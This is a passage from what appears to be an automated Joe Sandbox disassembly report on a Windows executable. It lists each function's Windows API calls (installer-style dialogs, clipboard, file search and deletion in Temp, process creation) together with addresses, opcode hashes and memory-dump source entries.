  • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
  • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
  • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
  • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
  • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
  • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
  • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
  • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
  • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
  • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
  • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
• Opcode ID: 9edf40dd620456944a3073f7ecab255b0d78d4833ca7daa8f9e88a8b745076c9
• Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
• Opcode Fuzzy Hash: 9edf40dd620456944a3073f7ecab255b0d78d4833ca7daa8f9e88a8b745076c9
• Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(00000000), ref: 004014EA
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 93ee68a11940325a9ced04c682ca8caeb947e30f70c8be79a55a08dd3566a10b
• Instruction ID: c44eb66d79cfe4ab40ed370e2c6e06efa86698fbc962cda5fd2e65c0cc136455
• Opcode Fuzzy Hash: 93ee68a11940325a9ced04c682ca8caeb947e30f70c8be79a55a08dd3566a10b
• Instruction Fuzzy Hash: 47D0A773A142008BD700EBF8BE854AF73F8EB403293215C3BD102E11D1E778C901561C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 3a0e7e5e5cdf62e96be2142a5155a3d8c657aa15ddb96e9066be89a7fa45203e
• Instruction ID: 69482a2579ef2b85c2ad9764c5c762c9eb4f19b2fcf4b87e51b14fafea8afdc0
• Opcode Fuzzy Hash: 3a0e7e5e5cdf62e96be2142a5155a3d8c657aa15ddb96e9066be89a7fa45203e
• Instruction Fuzzy Hash: EDC0123090470496F1206F79AE8FA153A64574073DBA48726B0B8B10F3CB7C5659555D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,00000403), ref: 00405779
• GetDlgItem.USER32(?,000003EE), ref: 00405788
• GetClientRect.USER32(?,?), ref: 004057C5
• GetSystemMetrics.USER32(00000002), ref: 004057CC
• SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
• ShowWindow.USER32(?,00000008), ref: 00405868
• GetDlgItem.USER32(?,000003EC), ref: 00405889
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
• GetDlgItem.USER32(?,000003F8), ref: 00405797
  • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
• GetDlgItem.USER32(?,000003EC), ref: 004058DB
• CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
• CloseHandle.KERNEL32(00000000), ref: 004058F0
• ShowWindow.USER32(00000000), ref: 00405914
• ShowWindow.USER32(?,00000008), ref: 00405919
• ShowWindow.USER32(00000008), ref: 00405963
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
• CreatePopupMenu.USER32 ref: 004059A8
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
• GetWindowRect.USER32(?,?), ref: 004059DC
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
• OpenClipboard.USER32(00000000), ref: 00405A3D
• EmptyClipboard.USER32 ref: 00405A43
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
• GlobalLock.KERNEL32(00000000), ref: 00405A59
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
• GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
• CloseClipboard.USER32 ref: 00405A9E
Strings
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
• Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
• Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
• Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404A16
• SetWindowTextW.USER32(00000000,?), ref: 00404A40
• SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
• CoTaskMemFree.OLE32(00000000), ref: 00404AFC
• lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
• lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
  • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
  • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
  • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
  • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
  • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A
                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
• lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
• lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
• lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
• FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
• FindClose.KERNEL32(00000000), ref: 00405DBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
• API String ID: 2035342205-1023570929
• Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
• Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
• Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
• Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
• FindClose.KERNEL32(00000000), ref: 004068CB
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
• Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
• Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
• Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: a90b5541f70cc3965861c320ab0ae6f4864bd50261fd75e99cc6532b3daacbe6
• Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
• Opcode Fuzzy Hash: a90b5541f70cc3965861c320ab0ae6f4864bd50261fd75e99cc6532b3daacbe6
• Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 5b0fb285c9b4bcb701b5bdc638fb86233a16d4678ca4d14c0689f288dbcc861d
• Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
• Opcode Fuzzy Hash: 5b0fb285c9b4bcb701b5bdc638fb86233a16d4678ca4d14c0689f288dbcc861d
• Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
• Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
• Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
• Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                    • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                                                                    • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                    • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1860320154-0
                                                                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
